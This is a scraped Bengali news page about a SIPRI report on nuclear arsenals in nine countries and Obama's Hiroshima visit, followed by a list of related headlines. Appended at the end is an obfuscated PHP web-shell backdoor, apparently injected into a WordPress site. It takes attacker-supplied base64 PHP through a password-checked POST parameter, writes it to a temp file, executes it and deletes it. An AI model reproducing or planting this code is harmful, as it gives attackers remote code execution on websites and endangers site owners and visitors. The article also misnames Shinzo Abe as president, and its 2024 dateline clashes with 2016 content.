শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

যে ৯টি দেশে রয়েছে বিশ্বের ১৫,৮৫০টি পারমাণবিক বোমা

 
আন্তর্জাতিক ডেস্ক : মার্কিন প্রেসিডেন্ট বারাক ওবামা তার ঐতিহাসিক হিরোশিমা সফরের সময় ‘পারমাণবিক অস্ত্র মুক্ত পৃথিবী’ গড়ে তোলার আহবান জানিয়েছেন। অথচ এই মুহূর্তে পৃথিবীতে রয়েছে ১৫ হাজার ৮৫০টি পারমাণবিক বোমা।স্টকহোম ইন্টারন্যাশনাল পিস রিসার্চ ইন্সটিটিউটের প্রকাশিত একটি প্রতিবেদন মতে, এই বোমাগুলো বিশ্বের মোট ৯টি দেশ ছড়িয়ে রয়েছে। বোমার সংখ্যাভিত্তিক স্টাটিসটার একটি তালিকায় দেখা যায়, মোট পারমানিক বোমার মধ্যে ৯৩ শতাংশই রয়েছে রাশিয়া ও যুক্তরাষ্ট্রে।

2016_05_29_15_59_37_sNkXVYUIYwEr7hFluG8s97VQW4IEMm_original

 

রাশিয়াতে রয়েছে সাড়ে সাত হাজার বোমা। তারপরেই যুক্তরাষ্ট্রে ৭ হাজার ২শ। এছাড়া ফ্রান্স, চীন, যুক্তরাজ্য, পাকিস্তান, ভারত, ইসরায়েল এবং সবার শেষে উত্তর কোরিয়া।দ্বিতীয় বিশ্বযুদ্ধের শেষ পর্যায়ে জাপানের হিরোশিমা ও নাগাসাকি শহরে পারমাণবিক বোমা হামলা চালায় যুক্তরাষ্ট্র। তখনই সারা বিশ্ব প্রথম এর ভয়াবহতা উপলব্ধি করে। ঐ হামলায় জাপানের প্রায় দেড় লাখ মানুষ মারা যান। বারাক ওবামাই প্রথম মার্কিন প্রেসিডেন্ট যিনি হিরোশিমা সফর করেছেন সম্প্রতি।

 

 

হিরোশিমায় জাপানের প্রেসিডেন্ট শিনজো অ্যাবে ও বোমার আঘাত থেকে বেঁচে যাওয়া মানুষের উদ্দেশ্যে ওবামা বলেন, ‘আমরা হয়তো মানুষের কুকর্ম করা পুরোপুরি বন্ধ করতে পারবো না, কিন্তু সবদেশ মিলেমিশে আমরা সেই কুকর্ম থেকে নিজেদেরকে রক্ষা করতে পারবো। আমাদের আর যে দেশগুলোর পারমাণবিক অস্ত্রের মজুদ রয়েছে তাদের ভয়ের যুক্তি থেকে বেরিয়ে পরমাণু মুক্ত পৃথিবী গড়ে তোলা উচিৎ।’

স্টকহোম ইন্টারন্যাশনাল পিস রিসার্চ ইন্সটিটিউটের প্রতিবেদনে বলা হয়, বিশ্বের মোট পরমাণু অস্ত্রের সংখ্যা কমছে। কারণ রাশিয়া ও যুক্তরাষ্ট্র তাদের অস্ত্রের সংখ্যা ক্রমশই কমিয়ে আনছে। যদিও চীন, ফ্রান্স, রাশিয়া এবং যুক্তরাজ্যের মত অন্য যে দেশগুলো বোমার সংখ্যা কমানোর চেয়ে বাড়ানোর ইঙ্গিতই দিয়ে আসছে এতদিন।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}